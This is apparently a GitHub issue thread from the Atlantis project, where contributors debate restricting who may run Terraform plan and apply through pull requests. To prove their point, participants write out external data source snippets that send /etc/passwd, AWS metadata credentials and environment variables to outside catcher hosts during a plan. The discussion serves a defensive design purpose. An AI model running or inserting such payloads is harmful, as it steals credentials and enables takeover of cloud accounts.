Could this also be extended to the other repository providers (e.g. GitLab)?
@darrylb-github any thoughts on this one?
@osterman Yea, we're hitting the same problems. We initially tried protected branches plus requiring approval in Atlantis, but that way you would have to protect all branches, which doesn't work well.
Your proposal would solve this for us as well via the `--gh-team-whitelist` option. I can't currently think of a better way to solve this.
I think it would be beyond my Atlantis/Go experience at the moment to implement this myself, but it does feel like a bit of a deal breaker unless we can find another workaround 🤔
Note I don't think it's necessary to restrict plans though; it's the apply I'm worried about.
@aknysh on my team started working on this today. Will keep you posted.
In our case, plans also need to be restricted since the external data provider runs on every plan and can run any command.
I think the best way to implement this is to use a server-side Atlantis.yaml config (#47). I don't want to go the direction of server flags because it's not scalable. Inevitably someone is going to want a specific config for a specific Terraform repo/directory/workspace which they won't be able to accomplish with a global flag.
Unfortunately the server-side config isn't complete but I think this will have to wait for that.
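For concreteness, here's a minimal sketch of the kind of scoped, server-side config that direction implies; the keys below are purely illustrative, not an implemented format:

```yaml
# Hypothetical illustration only, not a real Atlantis config format.
# Sketches how a server-side config could scope behavior per
# repo/directory/workspace instead of one global flag.
repos:
- id: github.com/org/prod-infra
  directory: networking/
  workspace: production
  apply_requirements: [approved]
```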
Can't this already be achieved with GitHub CODEOWNERS?
> Note I don't think it's necessary to restrict plans though; it's the apply I'm worried about.
I agree the scary thing from a security stance is the ability to run local and remote exec blocks, but those are not run during a plan.
I suppose longer term, supporting commands like `state (mv|rm)` comes to mind as well, once they are added to Atlantis.
We've implemented this here: https://github.com/cloudposse/atlantis/pull/7
We're taking Atlantis to the extreme. My goal is to have it on public repos so we can test modules. `terraform plan` is dangerous. As long as you can access the external data provider, you can do anything you want. The external data provider necessarily runs on plan and will execute any command on the machine.
Best policy is to know exactly who can run `apply` and `plan`.
> Unfortunately the server-side config isn't complete but I think this will have to wait for that.
@lkysow, I understand your position. As an architect of many systems, I struggle with it daily.
Guess from where I stand, this is a hard-stop, don't-even-consider-using-Atlantis kind of problem that everyone I talk to shares. They love the idea of Atlantis, but when I say "oh, and anyone with access to the repo can trigger an apply", it's a non-starter. Sometimes "what gets you here, doesn't get you there". I understand the desire to put this into the server-side config, but it sounds like the scope of that is much greater. Adding a stop-gap measure to address a major liability from a security perspective is warranted IMO, even if it is not the ideal long-term solution.
@osterman when you say if you can plan you can do anything you want, can you expand? Local/remote exec blocks are not evaluated during a plan, so any easy exfiltration and code execution can be stopped by requiring code review, as long as you are using the `--require-approval` server-side option and CODEOWNERS. Since GitHub evaluates CODEOWNERS based on your default branch (typically master) rather than what's in the branch/fork you are proposing, an attack would require two pull requests from someone with repo access, plus write protection and either an approval or privileges to bypass any branch protections. I can see the danger that they could write their own terraform provider that does pretty much anything they want. In the context of allowing it for only internal projects I think that would be sufficient, but with it being external I can see why that would be a major concern.
> but when I say "oh, and anyone with access to the repo can trigger an apply", it's a non-starter.
Agreed, if that were the case, but like I said, with a CLI arg and CODEOWNERS you can gate the apply even if not the plan. There is still danger for your use case, but at least the barrier to entry is much higher.
> I understand the desire to put this into the server-side config.
If it's meant to be a meaningful protection it must be server-side (whether it's a config option or CLI args), as otherwise an attacker can just change the permissions themselves.
I do see needing more fine-grained access controls in the future to safely support public projects, as well as when other commands such as `state`, `destroy`, etc. are implemented.
> oh, and anyone with access to the repo can trigger an apply
Can you explain why you think this is the case?
With `--require-approval` you need to be able to approve a pull request prior to `apply`. The list of approvers can be gated in all VCS providers.
Or do you mean that once a PR is approved, then anyone can apply? Which is true.
> @osterman when you say if you can plan you can do anything you want, can you expand? Local/remote exec blocks are not evaluated during a plan
Here's an example of using the external data provider to exfiltrate data during a `plan`.
Providers are not like the local or remote provisioners. They can hook into any part of the terraform lifecycle. In this case, the external data provider hooks into the plan cycle so that it can source data from external commands (e.g. a python script).
Here's an example of exfiltrating the first line of the `/etc/passwd` file (useless these days) to an external site, http://exfiltrate.requestcatcher.com/test.
Running `terraform plan` on the following will result in this command getting executed. It runs in the same context as an `apply` (e.g. EC2 instance profiles or ECS task roles), so presumably with all the same AWS credentials etc. It could be much worse.
```hcl
# https://www.terraform.io/docs/providers/external/data_source.html
data "external" "example" {
  program = ["/bin/bash", "-c", "(head -1 /etc/passwd | curl -XPOST -d@- http://exfiltrate.requestcatcher.com/test >/dev/null); echo {}"]
  query   = {}
}
```
@majormoses
> with a CLI arg and CODEOWNERS you can gate the apply even if not the plan, there is still danger for your use case but at least the barrier to entry is much higher.

This may be true on GitLab or other VCS providers, but not on GitHub. Per the atlantis documentation, anyone can approve a pull request. As far as I understand, CODEOWNERS only gates merging.
@lkysow
> With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.
Maybe there's some extra toggle somewhere in GitHub that further restricts approvals across the board. I won't rule it out.
This also seems to be the case per the CODEOWNERS documentation:
> they also can optionally require approval from a code owner before the author can merge a pull request in the repository
But the fact remains: a `terraform plan` can today execute any command.
> If it's meant to be a meaningful protection it must be server-side
Sorry, that was my own ambiguity. I was referring to args passed to `atlantis server`.
@aknysh on our team has implemented this here: https://github.com/cloudposse/atlantis/pull/7
Since it didn't seem like it was going to be accepted (per the earlier discussion), we didn't open a PR against runatlantis/atlantis.
Now, what would be truly nasty is to curl http://169.254.169.254/latest/meta-data/iam/security-credentials/... and exfiltrate those STS credentials, and thus have carte blanche remote access to AWS with whatever privileges are given to Atlantis.
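For concreteness, a minimal sketch of that variant using the same external data provider trick as above; the role name `atlantis-role` and the catcher URL are placeholders I've made up:

```hcl
# Hypothetical sketch: exfiltrate the instance role's STS credentials during a
# plan. "atlantis-role" and the destination URL are placeholders.
data "external" "steal_creds" {
  program = ["/bin/bash", "-c", "(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/atlantis-role | curl -s -XPOST -d@- http://exfiltrate.requestcatcher.com/creds >/dev/null); echo {}"]
  query   = {}
}
```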
> This may be true on GitLab or other VCS providers, but not on GitHub. Per the atlantis documentation, anyone can approve a pull request. As far as I understand, CODEOWNERS only gates merging.
So from what I remember (I could be wrong or not remembering correctly), if you set branch protection to use CODEOWNERS, it affects the mergeable state, and Atlantis uses this to determine if you can apply, so a review from anyone who has write access to the repo but is not a CODEOWNER does not count. I can try to set up a test to validate this.
@majormoses that would be cool - would love confirmation if that's how it works. If so, the atlantis documentation may be misleading, since the red warning dialog seems to say something different. However, since I could run the following in a `terraform plan` to trigger a `terraform apply`, it makes no effective difference to a bad actor. We need a `plan_requirements` section as well.
data "external" "example" {
program = ["/bin/bash", "-c", "terraform apply>/dev/null 2>&1); echo {}" ]
query = { }
}
> But the fact remains: a terraform plan can today execute any command.
It wouldn't be very useful if it couldn't, and I agree on the need to restrict that further, especially when implementing additional commands like `state`, `destroy`, etc. I'm just trying to figure out if the current protections are meaningful enough for internal projects, where it's more about preventing naive users from doing bad things than stopping malicious actors.
I have direct knowledge of a company that had 2 developer accounts hacked on the same weekend a few months back. Both had mandatory MFA enabled on their GitHub and Google email accounts. In their case, a social engineering attack allowed SIM jacking. A whitelist is not perfect; MFA would be better. But I'm just talking baby steps right now. Reducing the attack surface by restricting the number of engineers that can plan/apply changes (at least to production) makes me feel better.
I just tested, and it looks like it does not look at the mergeability state to determine if the apply can be run. @lkysow is that a bug or intended? I might be remembering wrong, but I seem to recall us talking about this a while ago.
Found it; it was something being discussed but not yet implemented: https://github.com/runatlantis/atlantis/issues/43. @osterman if that were implemented, would that solve most of your concerns? While it still relies on trusting GitHub, and a compromised account with enough privs could certainly disable protections, I think this would be a huge step in the right direction and should not be too hard to implement, I would think. One of the benefits of this approach is that it works with GitHub and GitLab (not sure if Bitbucket or other VCS providers have similar concepts), so it would help the most people for the least amount of effort.
Btw, the GitHub Universe conference is happening this week. Heard through the grapevine that better RBAC is coming (fingers crossed!) That said, the same source said GitHub was not coming out with CI/CD, and we know how that turned out. =P
@majormoses Re: #43, yes & no. I agree 100% with the intent of #43. Mergeability should be a criterion for `apply` when we say `approved`, though perhaps as an additional requirement:

```yaml
apply_requirements: [approved, mergeable]
```
If you take a look at our proposed solution in this PR: https://github.com/cloudposse/atlantis/pull/7, it scales somewhat better in terms of flexibility.

```sh
atlantis server --gh-team-whitelist=dev:plan,ops:apply,devops:*
```

This says that a team called `dev` can run `plan`, the team called `ops` can run `apply`, and a team called `devops` can do anything. Now, if we introduced a new verb like `destroy`, that could easily be tied to another team.
Granted, if a user wants to do full-on RBAC per workflow/step/etc, it's a very slippery slope.
I admit that this is kinda a GitHub-centric approach. We needed something before 10/25 =)
@osterman makes sense. I agree that more granular is better, and I hope GitHub RBAC is going to improve, although it will probably mean tons of refactoring again at my org.
There are several things to consider with the proposed approach. At my current organization we have 85 teams (and that might actually go up quite a bit as we are breaking up some of our larger teams), so specifying even 15-20 teams on the command line seems like not the best solution, though with a config file that might be OK. How would we handle sub/child teams? Also, the more you specify on the command line, the more is exposed in the process table, which is accessible to any user and could be used to plan the next attack. I generally recommend providing anything sensitive (secrets, team names, repo names, permissions, etc) via a config file, an ENV var, or pulled directly from a secret manager (such as HashiCorp Vault, AWS SSM, etc).
> Granted, if a user wants to do full-on RBAC per workflow/step/etc, it's a very slippery slope.
I don't think atlantis should be in the business of providing real RBAC for this very reason. In its current state, I'd say it's best to let some external process push status checks to your VCS provider and use the `mergeable` status it reports to determine whether an action can be performed. At some point it might make more sense to flesh out a fuller RBAC solution, but I think atlantis should provide "good enough" security (highly subjective what that means) and focus on other core improvements. I do agree that in the context of adding new commands beyond plan/apply we need something more robust.
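To sketch that external-gate idea: a process could post a commit status via the GitHub API, and a branch protection rule could require that status before the PR becomes mergeable. The repo, context name, and token handling below are placeholders:

```sh
# Hypothetical external gate: post a commit status that branch protection
# requires, so "mergeable" only turns true once this check passes.
# org/repo, the context name, and the env vars are placeholders.
curl -s -X POST \
  -H "Authorization: token $GITHUB_TOKEN" \
  "https://api.github.com/repos/org/repo/statuses/$COMMIT_SHA" \
  -d '{"state": "success", "context": "security/terraform-gate"}'
```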
Anyways that's just my $0.02
Wow, a lot to read here and I agree with both of you. I'm going to write up a bigger response with some plans to move forward so don't think I'm ignoring this, just crafting it!
> oh, and anyone with access to the repo can trigger an apply
> Can you explain why you think this is the case?
> With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.
I don't know of a way to do this with Bitbucket (Server / Data Center). You can have a list of required approvers for a merge, but anyone can be added as a reviewer and then approve it.
-- Kip
For those interested, we have a prototype of `--gh-repo-whitelist` available here (with binary releases): https://github.com/cloudposse/atlantis/releases
See pulls: https://github.com/cloudposse/atlantis/pulls
It also includes a number of other experimental features like `--wake-word` and `--repo-config`.
@majormoses @lkysow Would you be able to explain how CODEOWNERS helps? It appears to be ignored by Atlantis.
Right now it doesn't.
When #43 is fixed (#385 was just opened to fix it), you can make `mergeable` an `apply_requirement` and then make approval by CODEOWNERS required for a pull request to be mergeable.
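To illustrate how those pieces could fit together once #385 lands (a sketch under assumptions: the config shape below and the team name `@org/platform-team` are illustrative, not something the thread confirms):

```yaml
# Sketch: server-side repo config requiring both approval and mergeability
# before `atlantis apply` can run (shape assumed from the direction of #43/#385).
repos:
- id: /.*/
  apply_requirements: [approved, mergeable]
```

Paired with a CODEOWNERS entry and a branch protection rule that requires code owner review, `mergeable` stays false until a code owner approves:

```
# CODEOWNERS -- @org/platform-team is a placeholder team.
*.tf @org/platform-team
```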
I'm excited about #385! It's a step in the right direction.
Not to beat a dead horse; I just want to emphasize that without something like `plan_requirements`, we're still very exposed, since any command can be executed as part of `plan`. I don't want companies having a false sense of security. Full context of the previous discussion is available here.
@osterman I feel you; I don't think you are beating a dead horse. I agree we need something more, but it's a good start and leaves room for improvement. Would using the `mergeable` field to gate plans via a `plan_requirements` config option satisfy your needs? I'm still of the opinion that we should have the VCS providers (through mechanisms such as CODEOWNERS) keep track of the lists of people, as chances are they are already being tracked and updated there. Trying to reduce the duplication as much as possible.
@osterman I wonder if there could be some conditions around when to execute `plan` automatically. Or do you consider all resources (not just `data`, `local`, ...) dangerous?
thanks @majormoses!
> Would using the mergeable field to gate plans via a plan_requirements config option satisfy your needs?
Let's try to codify our "cloudposse" requirements:

- We would like to allow anyone (contributor, public, etc) to open a PR (but not anyone to run plan or apply)
- We would like to allow a specific list of users to run `plan` (it could be CODEOWNERS, but could also be opened up to a larger trusted group)
- With #385 and CODEOWNERS, the need to restrict who can run `apply` is sufficiently addressed

So as a stop-gap measure, I think `plan_requirements` would work actually. It just puts more onus on CODEOWNERS to also run `plan`.
> I'm still of the opinion that we should have the VCS providers (through mechanisms such as CODEOWNERS) keep track of the lists of people, as chances are they are already being tracked and updated there.
Yes, that would be my top choice as well.
Another idea would be to require a certain (configurable) number of CODEOWNERS to approve a PR for `apply` to work, and then another number of approvals to allow `plan` to work. This then implements a sort of two-man rule. I haven't thought this through too much; just trying to see how we could stick within the confines of the CODEOWNERS and approvals framework.
e.g.

- `apply` requires 2 approvals from CODEOWNERS
- `plan` requires 1 approval from CODEOWNERS
> I wonder if there could be some conditions around when to execute plan automatically. Or do you consider all resources (not just data, local, ...) dangerous?
@estahn I would prefer not to go down the path of evaluating resource safety, because we use Atlantis for more than just Terraform. Also, with external commands, I don't think there's any practical way to achieve this.
> Another idea would be to require a certain number of CODEOWNERS to approve a PR for apply.
You can actually do that via branch protections: GitHub's "Require pull request reviews before merging" rule lets you set the number of required approving reviews and require a review from code owners.
That does not address different plan vs apply requirements, but you could satisfy a two-man rule via means already (or shortly) available.
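For reference, a sketch of configuring that rule via the GitHub branch protection API; `org/repo`, the branch, and the token are placeholders:

```sh
# Hypothetical setup: require 2 approving reviews, at least one from a code
# owner, on master. org/repo and $GITHUB_TOKEN are placeholders.
curl -s -X PUT \
  -H "Authorization: token $GITHUB_TOKEN" \
  "https://api.github.com/repos/org/repo/branches/master/protection" \
  -d '{
    "required_status_checks": null,
    "enforce_admins": true,
    "restrictions": null,
    "required_pull_request_reviews": {
      "required_approving_review_count": 2,
      "require_code_owner_reviews": true
    }
  }'
```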
> We would like to allow anyone (contributor, public, etc) to open a PR (but not anyone to run plan or apply)
That sounds pretty doable with the current framework.
> We would like to allow a specific list of users to run plan (it could be CODEOWNERS, but could also be opened up to a larger trusted group)
Sounds like adding `plan_requirements` and `mergeable` satisfies the first portion. For the second portion, what would you envision? Would it be anyone with write access to the repo (we would probably need admin permissions on the repo to determine that), or a list?
> With #385 and CODEOWNERS, the need to restrict who can run apply is sufficiently addressed
:+1:
What is the status of this thread? My company is seriously looking at implementing Atlantis, and knowing the outcome of this discussion seems pretty important. @majormoses @lkysow @osterman
The "mergeable" option has been released, this allows you to disable auto planning and relying on branch protections (such as CODEOWNERS
with multiple reviews) to gate running a plan. While it does not address the specific request and I agree it still needs to be added but I think this should address most of the concerns around this in its current state. I think this will be an important prerequisite to introducing new features that allow state manipulation (import
, rm
, mv
, etc). I won't speak for @lkysow or @osterman but I don't see this as critical to implement right now without looking at adding additional state commands beyond plan and apply.
@justinhauer do those address your concerns? If not, I would like to understand your use case and flow.
@majormoses I just want to be crystal clear with your comments here (I think it addresses my needs).
1) If I disable auto planning, I can require review/approval to run `atlantis plan`?
2) I can have a member of CODEOWNERS be required to be one of the reviewers of each review/approval stage?
3) The same would apply to `atlantis apply` - needing a member of CODEOWNERS to approve?
Or did I misinterpret 2 and 3, and I can't restrict who can approve, I can just set the review to multiple persons?
Actually, sorry, I misspoke; it's been a while, and keeping track of the various conversations, issues, and pull requests in my head has been difficult. I think the next step is introducing a `plan_requirements` option similar to `apply_requirements`, and then using the `mergeable` option to gate 1. You can currently fulfill 2 and 3 via CODEOWNERS, branch protections, and `apply_requirements`.
I will say that I am pretty comfortable with my use case for my org at the moment, because we do not have any public repos that we hook up to atlantis, and at the moment we are only using it for github management itself. An attacker would need to compromise github accounts (which, as Erik pointed out, is certainly doable), know enough about the ways that external data sources can be abused in a plan, etc. to circumvent the current protections. This is obviously easier on a public project, since there they can intrinsically run a plan without compromising any accounts.
This can be accomplished via a custom server-side workflow now:

```yaml
workflows:
  custom:
    plan:
      steps:
      - run: if [ $USERNAME != "username" ]; then exit 1; fi
      - init
      - plan
```
I've been doing a little bit of research into Atlantis recently and came upon this thread. For what it's worth, I believe running Atlantis with terraform plugins pre-installed and running `init` with `-get-plugins=false` could mitigate the issues raised with `plan`.
By pre-installing plugins, administrators could remove the ability to use the `external` provider, which is likely not necessary for most installations. There is some info here. From what I'm reading, it's possible to use Atlantis' custom workflows to add these additional parameters.
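If I'm reading the custom-workflow docs right, that could look something like the sketch below; the workflow name and the plugin directory are assumptions on my part:

```yaml
# Sketch: force init to use only pre-installed plugins from a known directory.
# "locked-plugins" and /opt/terraform-plugins are placeholder choices.
workflows:
  locked-plugins:
    plan:
      steps:
      - init:
          extra_args: ["-get-plugins=false", "-plugin-dir=/opt/terraform-plugins"]
      - plan
```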
@ericnorris hmm, I am not sure that would help, as you could still leverage something the system has available. See the following comments:
I think these examples clearly illustrate the issue; essentially it highlights the danger of any CI system: it allows arbitrary code injection, and if it did not, it would not be very flexible. An attacker essentially needs nothing more than to, say, dump the env vars (essentially `env | curl -XPOST some_server -d @-`), cat a tfvars file, etc, and then exfiltrate the data in some way. Sending a POST via curl is probably one of the less detectable methods, but they could simply add it as an output and get the data via the VCS provider comment on the PR. The fact is, whatever is on the system for legitimate users is available for abuse as well. On most systems that will minimally be some form of shell, plus whatever additional scripting languages are installed by the OS or admin (python, perl, ruby, etc). While I think `-get-plugins=false` does solve some security concerns, it only addresses part of the concerns here. I am all for layering protections, but I don't want to give a false sense that this would fully address the problems outlined here.
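To make that concrete, the env-var dump described above fits in a few lines, assuming the external provider is still obtainable; the destination URL is a placeholder:

```hcl
# Sketch of the env-dump exfiltration mentioned above; attacker.example is a
# placeholder destination.
data "external" "env_dump" {
  program = ["/bin/bash", "-c", "(env | curl -s -XPOST http://attacker.example/collect -d @- >/dev/null); echo {}"]
  query   = {}
}
```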
@majormoses, unless I'm mistaken, all of those examples use the `external` provider, no? It is not a built-in provider, and is downloaded automatically from here. If you don't install that plugin, and limit `terraform` to only using pre-installed plugins, you cannot exfiltrate data during `plan` using `external`.
I understand that there may be other ways (e.g. `local-exec` provisioners), but I believe you will be safe during the `plan` stage if you only use providers that do not allow arbitrary code execution during plan.
@ericnorris you are correct (as long as client-side config is disabled); I thought it was a default included provider. I suppose if someone is using an old enough version of terraform where the plugins were embedded, that would be an issue. That being said, it's not something we can control, and they should be encouraged to upgrade anyway. There are some cases where an external data source would legitimately be required; for those, I suppose one could add a custom workflow that makes it available in that specific case, and default to a plugin directory otherwise. That being said, if it's installed on the system and you allow client (repo side) config, all bets are off: they can simply include the provider in the repo (as a local path) and modify the workflow to use the local copy, bypassing all the administrative protections.
Given this, I think it makes sense, as it minimally solves the bulk of the concerns if not their entirety. @osterman I think we should still implement more controls around different atlantis commands (which I see as a blocker to implementing additional state modification commands such as `state rm`, `state mv`, `import`, etc), but are there any other holes I am not seeing by changing the init commands to not download plugins? This at least forces the administrator into intentionally allowing remote code execution, so I think it's minimally a good step in the right direction.
One question I have is: should this be exposed as a first-class config property, or should we simply rely on server-side defined custom workflows and document how to accomplish it? I assume if we expose it, we should default to existing behavior so as to keep backwards compatibility.
> This can be accomplished via a custom server-side workflow now:
>
> ```yaml
> workflows:
>   custom:
>     plan:
>       steps:
>       - run: if [ $USERNAME != "username" ]; then exit 1; fi
>       - init
>       - plan
> ```
This solution works for us as well. I would just like to add that having the GitHub teams the user is assigned to available as a variable would make this more flexible and easier to maintain.
@svenwb does this work with Bitbucket too? Will $USERNAME contain the Bitbucket username?
> @svenwb does this work with Bitbucket too? Will $USERNAME contain the Bitbucket username?
Yes it will.
Amazing! So if I wanted to run apply and destroy with the default behavior and just add a check for an allowed list of users, I would just have to do this, right?

```yaml
apply:
  steps:
  - run: echo 'Checking Bitbucket user is allowed to run atlantis apply'
  - run: if [ $USERNAME != "username" ]; then exit 1; fi
  - init
  - apply
destroy:
  steps:
  - run: echo 'Checking Bitbucket user is allowed to run atlantis destroy'
  - run: if [ $USERNAME != "username" ]; then exit 1; fi
  - init
  - destroy
```
what
why
proposal
Add the following flags:

- Allow an explicit set of users.
- Allow teams in an organization.

The arg convention piggybacks on the existing convention of `--repo-whitelist`, and on the fact that all GitHub features are prefixed with `--gh-*`.
An alternative interface could be based on CODEOWNERS, but I think that will be more work to implement.
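As a sketch of what those two flags might look like together (note that `--gh-user-whitelist` is an illustrative name I've made up; only `--gh-team-whitelist` appears earlier in the thread):

```sh
# Hypothetical invocation; --gh-user-whitelist is an illustrative flag name only.
atlantis server \
  --gh-user-whitelist="alice:plan,bob:apply" \
  --gh-team-whitelist="dev:plan,ops:apply,devops:*"
```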